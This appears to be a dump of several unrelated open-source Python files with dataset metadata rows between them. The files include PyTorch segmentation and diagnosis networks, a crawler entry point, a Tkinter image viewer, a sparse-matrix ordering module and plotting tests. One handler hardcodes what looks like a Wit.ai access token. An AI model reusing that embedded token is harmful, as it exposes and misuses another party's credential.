'''
def __init__(self, classes):
super().__init__()
self.level1 = CBR(3, 16, 7, 2) # 384 x 384
self.p01 = PSPDec(16 + classes, classes, 160, 192)
self.p02 = PSPDec(16 + classes, classes, 128, 192)
self.p03 = PSPDec(16 + classes, classes, 96, 192)
self.p04 = PSPDec(16 + classes, classes, 72, 192)
self.class_0 = nn.Sequential(
nn.Conv2d(16 + 5 * classes, classes, 3, padding=1, bias=False),
nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
nn.ReLU(True), # nn.PReLU(classes),
# nn.Dropout2d(.1),
nn.Conv2d(classes, classes, 7, padding=3, bias=False)
)
self.level2 = DownSamplerA(16, 128)
self.level2_0 = DilatedParllelResidualBlockB1(128, 128)
self.level2_1 = DilatedParllelResidualBlockB1(128, 128) # 512 x 256
self.p10 = PSPDec(8 + 256, 64, 80, 96)
self.p20 = PSPDec(8 + 256, 64, 64, 96)
self.p30 = PSPDec(8 + 256, 64, 48, 96)
self.p40 = PSPDec(8 + 256, 64, 36, 96)
self.class_1 = nn.Sequential(
nn.Conv2d(8 + 256 + 64 * 4, classes, 3, padding=1, bias=False),
nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
nn.ReLU(True), # nn.PReLU(classes),
# nn.Dropout2d(.1),
nn.Conv2d(classes, classes, 1, bias=False),
nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
nn.ReLU(True)
)
self.br_2 = BR(256)
self.level3_0 = DownSamplerA(256, 256)
self.level3_1 = DilatedParllelResidualBlockB1(256, 256, 0.3)
self.level3_2 = DilatedParllelResidualBlockB1(256, 256, 0.3) # 256 x 128
self.level4_1 = DilatedParllelResidualBlockB1(256, 256, 0.3)
self.level4_2 = DilatedParllelResidualBlockB1(256, 256, 0.3)
self.level4_3 = DilatedParllelResidualBlockB1(256, 256, 0.3) # 128 x 64
self.p1 = PSPDec(512, 128, 40)
self.p2 = PSPDec(512, 128, 32)
self.p3 = PSPDec(512, 128, 24)
self.p4 = PSPDec(512, 128, 18)
self.br_4 = BR(512)
self.classifier = nn.Sequential(
nn.Conv2d(512 + 4 * 128, 128, 1, padding=0, bias=False),
nn.BatchNorm2d(128, momentum=0.95, eps=1e-3),
nn.ReLU(True), # nn.PReLU(classes),
# nn.Dropout2d(.1),
nn.Conv2d(128, classes, 3, padding=1, bias=False),
nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
nn.ReLU(True),
nn.Conv2d(classes, classes, 1, bias=False),
nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
nn.ReLU(True)
)
# C(320, classes, 7, 1)
self.upsample_1 = nn.Upsample(scale_factor=2, mode='bilinear')
self.upsample_2 = nn.Upsample(scale_factor=2, mode='bilinear')
self.upsample_3 = nn.Upsample(scale_factor=2, mode='bilinear')
def forward(self, input1):
# input1 = self.cmlrn(input)
output0 = self.level1(input1)
output1_0 = self.level2(output0)
output1 = self.level2_0(output1_0)
output1 = self.level2_1(output1)
output1 = self.br_2(torch.cat([output1_0, output1], 1))
output2_0 = self.level3_0(output1)
output2 = self.level3_1(output2_0)
output2 = self.level3_2(output2)
output3 = self.level4_1(output2)
output3 = self.level4_2(output3)
output3 = self.level4_3(output3)
output3 = self.br_4(torch.cat([output2_0, output3], 1))
output3 = self.classifier(
torch.cat([output3, self.p1(output3), self.p2(output3), self.p3(output3), self.p4(output3)], 1))
output3 = self.upsample_3(output3)
combine_up_23 = torch.cat([output3, output1], 1)
output23_hook = self.class_1(torch.cat(
[combine_up_23, self.p10(combine_up_23), self.p20(combine_up_23), self.p30(combine_up_23),
self.p40(combine_up_23)], 1))
output23_hook = self.upsample_2(output23_hook)
combine_up = torch.cat([output0, output23_hook], 1)
output0_hook = self.class_0(torch.cat(
[combine_up, self.p01(combine_up), self.p02(combine_up), self.p03(combine_up), self.p04(combine_up)], 1))
# output3 = output2_0 + output3
# classifier = self.classifier(output3)
classifier = self.upsample_1(output0_hook)
return classifier
class ResNetC1_YNet(nn.Module):
'''
Jointly learning the segmentation and classification with ESP as encoding blocks
'''
def __init__(self, classes, diagClasses, segNetFile=None):
super().__init__()
self.level4_0 = DownSamplerA(512, 128)
self.level4_1 = DilatedParllelResidualBlockB1(128, 128, 0.3)
self.level4_2 = DilatedParllelResidualBlockB1(128, 128, 0.3)
self.br_con_4 = BR(256)
self.level5_0 = DownSamplerA(256, 64)
self.level5_1 = DilatedParllelResidualBlockB1(64, 64, 0.3)
self.level5_2 = DilatedParllelResidualBlockB1(64, 64, 0.3)
self.br_con_5 = BR(128)
self.global_Avg = nn.AdaptiveAvgPool2d(1)
self.fc1 = nn.Linear(128, 64)
self.fc2 = nn.Linear(64, diagClasses)
# segmentation model
self.segNet = ResNetC1(classes)
if segNetFile is not None:
print('Loading pre-trained segmentation model')
self.segNet.load_state_dict(torch.load(segNetFile))
self.modules = []
for i, m in enumerate(self.segNet.children()):
self.modules.append(m)
def forward(self, input1):
output0 = self.modules[0](input1)
output1_0 = self.modules[6](output0) # downsample
output1 = self.modules[7](output1_0)
output1 = self.modules[8](output1)
output1 = self.modules[14](torch.cat([output1_0, output1], 1))
output2_0 = self.modules[15](output1) # downsample
output2 = self.modules[16](output2_0)
output2 = self.modules[17](output2)
output3 = self.modules[18](output2)
output3 = self.modules[19](output3)
output3 = self.modules[20](output3)
output3_hook = self.modules[25](torch.cat([output2_0, output3], 1))
output3 = self.modules[26](
torch.cat([output3_hook, self.modules[21](output3_hook), self.modules[22](output3_hook),
self.modules[23](output3_hook), self.modules[24](output3_hook)], 1))
output3 = self.modules[29](output3)
combine_up_23 = torch.cat([output3, output1], 1)
output23_hook = self.modules[13](torch.cat(
[combine_up_23, self.modules[9](combine_up_23), self.modules[10](combine_up_23),
self.modules[11](combine_up_23),
self.modules[12](combine_up_23)], 1))
output23_hook = self.modules[28](output23_hook)
combine_up = torch.cat([output0, output23_hook], 1)
output0_hook = self.modules[5](torch.cat(
[combine_up, self.modules[1](combine_up), self.modules[2](combine_up), self.modules[3](combine_up),
self.modules[4](combine_up)], 1))
# segmentation classsifier
classifier = self.modules[27](output0_hook)
# diagnostic branch
l5_0 = self.level4_0(output3_hook)
l5_1 = self.level4_1(l5_0)
l5_2 = self.level4_2(l5_1)
l5_con = self.br_con_4(torch.cat([l5_0, l5_2], 1))
l6_0 = self.level5_0(l5_con)
l6_1 = self.level5_1(l6_0)
l6_2 = self.level5_2(l6_1)
l6_con = self.br_con_5(torch.cat([l6_0, l6_2], 1))
glbAvg = self.global_Avg(l6_con)
flatten = glbAvg.view(glbAvg.size(0), -1)
fc1 = self.fc1(flatten)
diagClass = self.fc2(fc1)
return classifier, diagClass
class ResNetD1(nn.Module):
'''
Segmentation model with RCB as encoding blocks.
This is the same as in Stage 1
'''
def __init__(self, classes):
super().__init__()
self.level1 = CBR(3, 16, 7, 2) # 384 x 384
self.p01 = PSPDec(16 + classes, classes, 160, 192)
self.p02 = PSPDec(16 + classes, classes, 128, 192)
self.p03 = PSPDec(16 + classes, classes, 96, 192)
self.p04 = PSPDec(16 + classes, classes, 72, 192)
self.class_0 = nn.Sequential(
nn.Conv2d(16 + 5 * classes, classes, 3, padding=1, bias=False),
nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
nn.ReLU(True),
nn.Conv2d(classes, classes, 7, padding=3, bias=False)
)
self.level2 = DownSamplerA(16, 128)
self.level2_0 = BasicResidualBlock(128, 128)
self.level2_1 = BasicResidualBlock(128, 128) # 512 x 256
self.p10 = PSPDec(8 + 256, 64, 80, 96)
self.p20 = PSPDec(8 + 256, 64, 64, 96)
self.p30 = PSPDec(8 + 256, 64, 48, 96)
self.p40 = PSPDec(8 + 256, 64, 36, 96)
self.class_1 = nn.Sequential(
nn.Conv2d(8 + 256 + 64 * 4, classes, 3, padding=1, bias=False),
nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
nn.ReLU(True),
nn.Conv2d(classes, classes, 1, bias=False),
nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
nn.ReLU(True)
)
self.br_2 = BR(256)
self.level3_0 = DownSamplerA(256, 256)
self.level3_1 = BasicResidualBlock(256, 256, 0.3)
self.level3_2 = BasicResidualBlock(256, 256, 0.3)
self.level4_1 = BasicResidualBlock(256, 256, 0.3)
self.level4_2 = BasicResidualBlock(256, 256, 0.3)
self.level4_3 = BasicResidualBlock(256, 256, 0.3)
self.p1 = PSPDec(512, 128, 40)
self.p2 = PSPDec(512, 128, 32)
self.p3 = PSPDec(512, 128, 24)
self.p4 = PSPDec(512, 128, 18)
self.br_4 = BR(512)
self.classifier = nn.Sequential(
nn.Conv2d(512 + 128 * 4, 128, 1, padding=0, bias=False),
nn.BatchNorm2d(128, momentum=0.95, eps=1e-3),
nn.ReLU(True),
nn.Conv2d(128, classes, 3, padding=1, bias=False),
nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
nn.ReLU(True),
nn.Conv2d(classes, classes, 1, bias=False),
nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
nn.ReLU(True)
)
self.upsample_1 = nn.Upsample(scale_factor=2, mode='bilinear')
self.upsample_2 = nn.Upsample(scale_factor=2, mode='bilinear')
self.upsample_3 = nn.Upsample(scale_factor=2, mode='bilinear')
def forward(self, input1):
# input1 = self.cmlrn(input)
output0 = self.level1(input1)
output1_0 = self.level2(output0)
output1 = self.level2_0(output1_0)
output1 = self.level2_1(output1)
output1 = self.br_2(torch.cat([output1_0, output1], 1))
output2_0 = self.level3_0(output1)
output2 = self.level3_1(output2_0)
output2 = self.level3_2(output2)
output3 = self.level4_1(output2)
output3 = self.level4_2(output3)
output3 = self.level4_3(output3)
output3 = self.br_4(torch.cat([output2_0, output3], 1))
output3 = self.classifier(
torch.cat([output3, self.p1(output3), self.p2(output3), self.p3(output3), self.p4(output3)], 1))
output3 = self.upsample_3(output3)
combine_up_23 = torch.cat([output3, output1], 1)
output23_hook = self.class_1(torch.cat(
[combine_up_23, self.p10(combine_up_23), self.p20(combine_up_23), self.p30(combine_up_23),
self.p40(combine_up_23)], 1))
output23_hook = self.upsample_2(output23_hook)
combine_up = torch.cat([output23_hook, output0], 1)
output0_hook = self.class_0(torch.cat(
[combine_up, self.p01(combine_up), self.p02(combine_up), self.p03(combine_up), self.p04(combine_up)], 1))
classifier = self.upsample_1(output0_hook)
return classifier
class ResNetD1_YNet(nn.Module):
'''
Jointly learning the segmentation and classification with RCB as encoding blocks
'''
def __init__(self, classes, diagClasses, segNetFile=None):
super().__init__()
self.level4_0 = DownSamplerA(512, 128) # 24x24
self.level4_1 = BasicResidualBlock(128, 128, 0.3)
self.level4_2 = BasicResidualBlock(128, 128, 0.3)
self.br_con_4 = BR(256)
self.level5_0 = DownSamplerA(256, 64) # 12x12
self.level5_1 = BasicResidualBlock(64, 64, 0.3)
self.level5_2 = BasicResidualBlock(64, 64, 0.3)
self.br_con_5 = BR(128)
self.global_Avg = nn.AdaptiveAvgPool2d(1)
self.fc1 = nn.Linear(128, 64)
self.fc2 = nn.Linear(64, diagClasses)
self.segNet = ResNetD1(classes) # 384 x 384
if segNetFile is not None:
print('Loading segmentation pre-trained model')
self.segNet.load_state_dict(torch.load(segNetFile))
self.modules = []
for i, m in enumerate(self.segNet.children()):
self.modules.append(m)
# print(i, m)
def forward(self, input1):
output0 = self.modules[0](input1)
output1_0 = self.modules[6](output0) # downsample
output1 = self.modules[7](output1_0)
output1 = self.modules[8](output1)
output1 = self.modules[14](torch.cat([output1_0, output1], 1))
output2_0 = self.modules[15](output1) # downsample
output2 = self.modules[16](output2_0)
output2 = self.modules[17](output2)
output3 = self.modules[18](output2)
output3 = self.modules[19](output3)
output3 = self.modules[20](output3)
output3_hook = self.modules[25](torch.cat([output2_0, output3], 1))
output3 = self.modules[26](
torch.cat([output3_hook, self.modules[21](output3_hook), self.modules[22](output3_hook),
self.modules[23](output3_hook), self.modules[24](output3_hook)], 1))
output3 = self.modules[29](output3)
combine_up_23 = torch.cat([output3, output1], 1)
output23_hook = self.modules[13](torch.cat(
[combine_up_23, self.modules[9](combine_up_23), self.modules[10](combine_up_23),
self.modules[11](combine_up_23),
self.modules[12](combine_up_23)], 1))
output23_hook = self.modules[28](output23_hook)
combine_up = torch.cat([output0, output23_hook], 1)
output0_hook = self.modules[5](torch.cat(
[combine_up, self.modules[1](combine_up), self.modules[2](combine_up), self.modules[3](combine_up),
self.modules[4](combine_up)], 1))
# segmentation classsifier
classifier = self.modules[27](output0_hook)
# diagnostic branch
l5_0 = self.level4_0(output3_hook)
l5_1 = self.level4_1(l5_0)
l5_2 = self.level4_2(l5_1)
l5_con = self.br_con_4(torch.cat([l5_0, l5_2], 1))
l6_0 = self.level5_0(l5_con)
l6_1 = self.level5_1(l6_0)
l6_2 = self.level5_2(l6_1)
l6_con = self.br_con_5(torch.cat([l6_0, l6_2], 1))
glbAvg = self.global_Avg(l6_con)
flatten = glbAvg.view(glbAvg.size(0), -1)
fc1 = self.fc1(flatten)
diagClass = self.fc2(fc1)
return classifier, diagClass
| 35.412141 | 121 | 0.591664 | 21,721 | 0.979836 | 0 | 0 | 0 | 0 | 0 | 0 | 1,790 | 0.080747 |
5e16f149874edd109b6f8b910bb8ac81d76a5978 | 239 | py | Python | src/ast/socps/__init__.py | cvxgrp/qcml | ff5e378cfeeebcf3f85a6e30c3449585f9af869f | [
"BSD-2-Clause-FreeBSD"
] | 26 | 2015-02-06T02:59:17.000Z | 2021-11-15T18:13:27.000Z | src/ast/socps/__init__.py | cvxgrp/qcml | ff5e378cfeeebcf3f85a6e30c3449585f9af869f | [
"BSD-2-Clause-FreeBSD"
] | 6 | 2015-06-14T04:43:43.000Z | 2019-10-27T11:03:30.000Z | src/ast/socps/__init__.py | cvxgrp/qcml | ff5e378cfeeebcf3f85a6e30c3449585f9af869f | [
"BSD-2-Clause-FreeBSD"
] | 6 | 2015-03-14T07:40:56.000Z | 2019-12-30T23:11:36.000Z | """ Technically, a every problem is a program; but not every program is a
problem.
This distinction only really matters if we introduce nodes for For loops
and whatnot.
Then the problem has 'program-like' constructs.
"""
| 26.555556 | 76 | 0.715481 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 238 | 0.995816 |
5e18d5ae2551f5b9932d20a83fb9244f3bfde336 | 1,526 | py | Python | touchdown/goals/snapshot.py | yaybu/touchdown | 70ecda5191ce2d095bc074dcb23bfa1584464814 | [
"Apache-2.0"
] | 14 | 2015-01-05T18:18:04.000Z | 2022-02-07T19:35:12.000Z | touchdown/goals/snapshot.py | yaybu/touchdown | 70ecda5191ce2d095bc074dcb23bfa1584464814 | [
"Apache-2.0"
] | 106 | 2015-01-06T00:17:13.000Z | 2019-09-07T00:35:32.000Z | touchdown/goals/snapshot.py | yaybu/touchdown | 70ecda5191ce2d095bc074dcb23bfa1584464814 | [
"Apache-2.0"
] | 5 | 2015-01-30T10:18:24.000Z | 2022-02-07T19:35:13.000Z | # Copyright 2015 Isotoma Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from touchdown.core import errors
from touchdown.core.goals import Goal, register
class Snapshot(Goal):
""" Snapshot a database """
name = "snapshot"
def get_plan_class(self, resource):
plan_class = resource.meta.get_plan("snapshot")
if not plan_class:
plan_class = resource.meta.get_plan("null")
return plan_class
@classmethod
def setup_argparse(cls, parser):
parser.add_argument(
"target", metavar="TARGET", type=str, help="The resource to snapshot"
)
parser.add_argument(
"snapshot_name", metavar="TO", type=str, help="The snapshot name"
)
def execute(self, target, snapshot_name):
snapshotable = self.collect_as_dict("snapshot")
if target not in snapshotable:
raise errors.Error('No such resource "{}"'.format(target))
snapshotable[target].snapshot(snapshot_name)
register(Snapshot)
| 31.791667 | 81 | 0.692005 | 842 | 0.551769 | 0 | 0 | 287 | 0.188073 | 0 | 0 | 730 | 0.478375 |
5e18e6288b6b07a784cee38e7f2cbe8ce2280ae9 | 548 | py | Python | crawler_main.py | yangwenke2010/template_crawler | b95e626184cda21d2abe01fd1f2b399e4946e782 | [
"Apache-2.0"
] | 4 | 2018-12-16T15:06:20.000Z | 2022-03-09T11:18:11.000Z | crawler_main.py | yangwenke2010/template_crawler | b95e626184cda21d2abe01fd1f2b399e4946e782 | [
"Apache-2.0"
] | 1 | 2018-10-12T07:32:13.000Z | 2018-10-12T07:32:13.000Z | crawler_main.py | yangwenke2010/template_crawler | b95e626184cda21d2abe01fd1f2b399e4946e782 | [
"Apache-2.0"
] | 2 | 2018-10-12T06:58:08.000Z | 2020-03-19T10:44:34.000Z | #!/bin/bash
# -*- coding: utf-8 -*-
# Crawler Main
#
# Author : Tau Woo
# Date : 2018-07-19
from do.crawler import Do
from sys import argv
if __name__ == "__main__":
'''Crawler Main
Start crawl websites with appointed config.
'''
# You will get appointed crawler name from command.
crawler_name = "sample" if len(argv) == 1 else argv[1]
crawler = Do(crawler_name)
crawler.do()
# Here is a test for data from redis to xlsx files.
# crawler.rds_to_xlsx("{}.xlsx".format(crawler_name), crawler_name)
| 22.833333 | 71 | 0.645985 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 354 | 0.645985 |
5e19d0ee97555a2535e07c68aeeb0e5f3e4eecae | 1,660 | py | Python | gui_showcase/main.py | maliozer/rodnet | 423a718f9ab5f2cc132f0f8a79dc1423704dbd3b | [
"MIT"
] | 1 | 2020-09-06T20:54:06.000Z | 2020-09-06T20:54:06.000Z | gui_showcase/main.py | maliozer/rodnet | 423a718f9ab5f2cc132f0f8a79dc1423704dbd3b | [
"MIT"
] | null | null | null | gui_showcase/main.py | maliozer/rodnet | 423a718f9ab5f2cc132f0f8a79dc1423704dbd3b | [
"MIT"
] | null | null | null | from tkinter import *
from PIL import ImageTk, Image
from tkinter import filedialog
gui = Tk()
gui.title('RODNET | Inzva AI Project Showcase v0.1')
#logo var en son ekleriz yorumda kalabilir
logo_image_path = Image.open('./images/inzva_logo.png')
inzva_logo = ImageTk.PhotoImage(logo_image_path)
inzva_logo_label = Label(image=inzva_logo).pack()
#window size
canvas = Canvas(gui, width=800, height=500)
canvas.pack()
#title
rodnet_label = Label(gui, text="RODNET Robust Object Detection Beta Showcase: ",font=("Helvetica", 12)).pack()
def change(image_new):
canvas.itemconfig(image_id, image=image_new)
def open():
global predicted_image
gui.filename = filedialog.askopenfilename(initialdir="/", title="Select a File", filetypes=(("png files", "*.png"),("all files", "*.*")))
if(gui.filename):
global image2
print(gui.filename) #image path on local pc
#call predictor with (gui.filename)
image2_open = Image.open(gui.filename)
if(image2_open.width > 800):
w = int(image2_open.width * 0.5)
h = int(image2_open.height * 0.5)
image2_open = image2_open.resize((w,h), Image.ANTIALIAS)
image2 = ImageTk.PhotoImage(image2_open)
#update canvas
change(image2)
else:
print("No selection")
image_showcase = PhotoImage(file="./images/rodnet_logo.png")
#offset = [int((800 - image_showcase.width()) /2)]
image_id = canvas.create_image(0, 10, anchor='nw', image=image_showcase)
open_label = Label(gui, text="Select the image: ").pack()
open_button = Button(gui, text="Open File", command=open).pack()
gui.mainloop() | 29.122807 | 141 | 0.678313 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 434 | 0.261446 |
5e1bf0067d53075a4199123df0352e8002b66c4e | 7,233 | py | Python | heap_md.py | sorrento/sdopt-tearing | f726e9abbb2d47f93aac32e54949051d3968664b | [
"BSD-3-Clause"
] | null | null | null | heap_md.py | sorrento/sdopt-tearing | f726e9abbb2d47f93aac32e54949051d3968664b | [
"BSD-3-Clause"
] | null | null | null | heap_md.py | sorrento/sdopt-tearing | f726e9abbb2d47f93aac32e54949051d3968664b | [
"BSD-3-Clause"
] | null | null | null | # Copyright (C) 2014, 2015 University of Vienna
# All rights reserved.
# BSD license.
# Author: Ali Baharev <ali.baharev@gmail.com>
# Heap-based minimum-degree ordering with NO lookahead.
#
# See also min_degree.py which uses lookahead, and simple_md.py which is a
# hacked version of min_degree.py that still uses repeated linear scans to find
# the minimum degree nodes but does not do lookahead.
from __future__ import print_function
from py3compat import cPickle_loads, cPickle_dumps, cPickle_HIGHEST_PROTOCOL
from itertools import chain
from networkx import max_weight_matching
from pqueue import PriorityQueue as heapdict
from py3compat import irange
from order_util import colp_to_spiked_form, get_hessenberg_order, check_spiked_form,\
coo_matrix_to_bipartite, partial_relabel, argsort, \
get_inverse_perm, get_row_weights
from plot_ordering import plot_hessenberg, plot_bipartite
def hessenberg(rows, cols, values, n_rows, n_cols, tie_breaking):
'Tie breaking options: MIN_FIRST, MAX_FIRST, IGNORE'
assert tie_breaking in ('IGNORE', 'MIN_FIRST', 'MAX_FIRST'), tie_breaking
# The col IDs in cols are shifted by n_rows, must undo later
g, eqs, _ = coo_matrix_to_bipartite(rows, cols, values, (n_rows, n_cols))
if tie_breaking != 'IGNORE':
# Relabel the rows such that they are ordered by weight
row_weights = get_row_weights(g, n_rows)
reverse = True if tie_breaking == 'MAX_FIRST' else False
row_pos = argsort(row_weights, reverse)
mapping = {n: i for i, n in enumerate(row_pos)}
#
eqs = set(mapping[eq] for eq in eqs)
g = partial_relabel(g, mapping)
#
rperm, cperm, _, _, _, _ = to_hessenberg_form(g, eqs)
# Finally, shift the colp such that it is a permutation of 0 .. n_cols-1
cperm = [c-n_rows for c in cperm]
#
if tie_breaking != 'IGNORE':
rperm = [row_pos[r] for r in rperm]
#
rowp, colp = get_inverse_perm(rperm, cperm)
assert sorted(rowp) == list(irange(n_rows))
assert sorted(colp) == list(irange(n_cols))
return rowp, colp
################################################################################
#
# TODO Hereafter, rowp and colp here seems to be consistently used for
# rperm and cperm, the permuted row and col identifiers.
#
################################################################################
def to_spiked_form(g, eqs, forbidden=None):
'''Returns the tuple of: bool singular, [row permutation],
[column permutation], [spike variables], [residual equations]. The spikes
and the residuals are ordered according to the permutation.'''
# Check singularity, apparently only the permutation to spiked form needs it
#assert 2*len(eqs) == len(g), 'Not a square matrix!'
matches = max_weight_matching(g)
print(len(matches))
#if len(matches) != 2*len(eqs):
# return (True, [], [], [], [])
if forbidden is None:
forbidden = set()
rowp, colp_hess, matches, tear_set, sink_set = min_degree(g, eqs, forbidden)
print('ok')
colp = colp_to_spiked_form(rowp, colp_hess, matches, tear_set, sink_set)
#check_spiked_form(g, rowp, colp, tear_set)
plot_hessenberg(g, rowp, colp_hess, [], '')
plot_bipartite(g, forbidden, rowp, colp)
tears = [c for c in colp if c in tear_set]
sinks = [r for r in rowp if r in sink_set]
return (False, rowp, colp, tears, sinks)
def to_hessenberg_form(g, eqs, forbidden=None):
'''Returns the tuple of: [row permutation], [column permutation],
[guessed variables], [residual equations], [row matches], [col matches].
Everything is ordered according to the permutation.'''
rowp, colp, matches, tear_set, sink_set = min_degree(g, eqs, forbidden)
tears = [c for c in colp if c in tear_set]
sinks = [r for r in rowp if r in sink_set]
row_matches = [r for r in rowp if r in matches]
col_matches = [c for c in colp if c in matches]
#plot_hessenberg(g, rowp, colp, [], '')
#plot_bipartite(g, forbidden, rowp, colp)
return (rowp, colp, tears, sinks, row_matches, col_matches)
def min_degree(g_orig, eqs, forbidden=None):
'''Returns: tuple([row permutation], [column permutation],
{eq: var and var: eq matches}, set(tear vars), set(residual equations)).'''
# Duplicated in bb_tear.initial_solution with none forbidden
assert eqs
if forbidden is None:
forbidden = set()
if not isinstance(eqs, (set, dict)):
eqs = set(eqs) # Make sure that `n in eqs` will be O(1).
g_allowed, g = setup_graphs(g_orig, forbidden)
eq_tot = create_heap(g_allowed, g, eqs)
rowp, matches = [ ], { }
while eq_tot:
(_cost, _tot, _eq), eq = eq_tot.popitem()
#assert _eq == eq, (_eq, eq)
#print('Eq:', eq)
rowp.append(eq)
if g_allowed[eq]:
var = sorted(g_allowed[eq])[0] # or [-1] for last
assert eq not in matches
assert var not in matches
matches[eq] = var
matches[var] = eq
#print('Var:', var)
vrs = sorted(g[eq])
eqs_update = set(chain.from_iterable(g[v] for v in vrs))
eqs_update.discard(eq)
g_allowed.remove_node(eq)
g.remove_node(eq)
g_allowed.remove_nodes_from(vrs)
g.remove_nodes_from(vrs)
for e in sorted(eqs_update): # keep in sync with create_heap
tot = len(g[e])
cost = tot-1 if g_allowed[e] else tot
eq_tot[e] = (cost, tot, e)
assert len(rowp) == len(eqs)
# The row permutation determines the column permutation, let's get it!
# get_hessenberg_order also asserts non-increasing envelope, among others
colp = get_hessenberg_order(g_orig, eqs, rowp)
sink_set = { n for n in rowp if n not in matches }
tear_set = { n for n in colp if n not in matches }
#
#print('Number of tears:', len(tear_set))
#print('Row permutation:', rowp)
#print('Col permutation:', colp)
#
return rowp, colp, matches, tear_set, sink_set
def setup_graphs(g_orig, forbidden):
# g is a copy of g_orig; g_allowed contains only the allowed edges of g_orig
g_pkl = cPickle_dumps(g_orig, cPickle_HIGHEST_PROTOCOL)
g = cPickle_loads(g_pkl)
g_allowed = cPickle_loads(g_pkl)
adj = g_allowed.adj
for u, v in forbidden:
g_allowed.remove_edge(u,v)
#del adj[u][v]
#del adj[v][u] # assumes no self loops
return g_allowed, g
def create_heap(g_allowed, g, eqs):
eq_tot = heapdict()
for e in sorted(eqs):
tot = len(g[e])
cost = tot-1 if g_allowed[e] else tot
eq_tot[e] = (cost, tot, e)
return eq_tot
def run_tests():
from test_tearing import gen_testproblems
for g, eqs, forbidden in gen_testproblems():
rowp, colp, tears, sinks, mr, mc = to_hessenberg_form(g, eqs, forbidden)
print('Rowp:', rowp)
print('Colp:', colp)
print('Tears:', tears)
print('Residuals:', sinks)
print('mr:', mr)
print('mc:', mc)
if __name__=='__main__':
run_tests()
| 37.671875 | 85 | 0.632103 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,503 | 0.346053 |
5e1c13b5fde8efced653749af34695c0b5d9ba5a | 498 | py | Python | philia-service/wit-service/wit_service.py | BuildForSDGCohort2/masta-backend | 08c20fe910f8ab953714ac72f34cdead7a307bd3 | [
"MIT"
] | 1 | 2020-11-25T12:01:31.000Z | 2020-11-25T12:01:31.000Z | philia-service/wit-service/wit_service.py | BuildForSDGCohort2/masta-backend | 08c20fe910f8ab953714ac72f34cdead7a307bd3 | [
"MIT"
] | 6 | 2020-08-31T12:12:53.000Z | 2020-10-01T13:00:44.000Z | philia-service/wit-service/wit_service.py | BuildForSDGCohort2/masta-backend | 08c20fe910f8ab953714ac72f34cdead7a307bd3 | [
"MIT"
] | 1 | 2020-08-31T15:31:37.000Z | 2020-08-31T15:31:37.000Z | import json
from wit import Wit
access_token = "2PLFUWBVVTYQCSEL6VDJ3AFQLUCTV7ZH"
client = Wit(access_token=access_token)
def wit_handler(event, context):
utterance = 'good morning john'
response = client.message(msg=utterance)
intent = None
entity = None
try:
intent = list(response['intents'])[0]
entity = list(response['entities'])
except:
pass
return {
'statusCode': 200,
'body': json.dumps(intent, entity)
}
| 19.153846 | 49 | 0.63253 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 90 | 0.180723 |
5e1c80a3d2808f3e17cc61a45407995b0eca85e2 | 1,674 | py | Python | py/server/tests/test_plot/test_color.py | mattrunyon/deephaven-core | 80e3567e4647ab76a81e483d0a8ab542f9aadace | [
"MIT"
] | null | null | null | py/server/tests/test_plot/test_color.py | mattrunyon/deephaven-core | 80e3567e4647ab76a81e483d0a8ab542f9aadace | [
"MIT"
] | null | null | null | py/server/tests/test_plot/test_color.py | mattrunyon/deephaven-core | 80e3567e4647ab76a81e483d0a8ab542f9aadace | [
"MIT"
] | null | null | null | #
# Copyright (c) 2016-2022 Deephaven Data Labs and Patent Pending
#
import unittest
from deephaven import read_csv, DHError
from deephaven.plot import Color, Colors
from deephaven.plot import Figure
from deephaven.plot import LineEndStyle, LineStyle
from tests.testbase import BaseTestCase
class ColorTestCase(BaseTestCase):
def setUp(self):
self.test_table = read_csv("tests/data/test_table.csv")
def tearDown(self) -> None:
self.test_table = None
def test_color(self):
figure = Figure()
new_f = figure.plot_xy("plot1", self.test_table, x="a", y="b")
line = new_f.line(color=Colors.RED, style=LineStyle(width=1.0, end_style=LineEndStyle.ROUND))
self.assertIsNotNone(line)
def test_color_hsl(self):
figure = Figure()
custom_color = Color.of_hsl(h=128, s=58, l=68, alpha=0.6)
new_f = figure.plot_xy("plot1", self.test_table, x="a", y="b")
line = new_f.line(color=custom_color, style=LineStyle(width=1.0, end_style=LineEndStyle.ROUND))
self.assertIsNotNone(line)
def test_color_factory(self):
Color.of_name("RED")
Color.of_rgb(12, 16, 188, 200)
Color.of_rgb_f(0.2, 0.6, 0.88, alpha=0.2)
Color.of_hsl(h=128, s=58, l=68, alpha=0.6)
with self.assertRaises(DHError):
Color.of_name("REDDER")
with self.assertRaises(DHError):
Color.of_rgb(12, 16, 288)
with self.assertRaises(DHError):
Color.of_rgb_f(1.2, 0.6, 0.88, alpha=0.2)
with self.assertRaises(DHError):
Color.of_hsl(h=377, s=58, l=168, alpha=10)
if __name__ == '__main__':
unittest.main()
| 33.48 | 103 | 0.651732 | 1,328 | 0.793309 | 0 | 0 | 0 | 0 | 0 | 0 | 144 | 0.086022 |
5e1d9ee77b00022f4700b24ef8893c1143b97d6b | 6,199 | py | Python | Tools/unicode/genmap_support.py | shawwn/cpython | 0ff8a3b374286d2218fc18f47556a5ace202dad3 | [
"0BSD"
] | 52,316 | 2015-01-01T15:56:25.000Z | 2022-03-31T23:19:01.000Z | Tools/unicode/genmap_support.py | shawwn/cpython | 0ff8a3b374286d2218fc18f47556a5ace202dad3 | [
"0BSD"
